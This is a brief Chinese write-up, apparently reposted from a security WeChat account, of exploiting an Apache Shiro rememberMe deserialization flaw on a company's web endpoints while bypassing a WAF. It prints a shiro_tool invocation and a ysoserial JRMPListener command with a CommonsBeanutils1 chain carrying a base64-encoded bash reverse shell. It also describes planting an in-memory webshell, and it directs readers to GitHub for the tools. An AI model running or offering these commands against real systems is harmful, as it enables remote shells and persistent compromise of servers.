常规工具一把梭

直接命令执行，发现失败了，注意观察rememberMe值的长度，许多waf喜欢在长度上做手脚：

换个利用链，结果也是失败的：

原文地址

carrypan，公众号：安全艺术记一次shiro绕waf的记录

• shiro_tool

命令

java -jar shiro_tool.jar http://xxx.xxx.com/api/front/content/list

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZG*************3Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

• 飞鸿

JRMP

到这里猜测目标或许也不出网吧，那试试直接写入内存马（注意内存马的路径，目录全试试），可以看到内存马的rememberMe的值长度也是低于5k的，可以成功写入：

找了半天没找到web根目录（怀疑人生啊），而且命令也无法执行……

无厘头来了，过了一天继续利用，部分命令又可以回显了……

后续测试这家企业，又发现其它网站这个接口下也存在同样的漏洞，利用过程也是同样的无厘头......

注：工具github上自取就好哈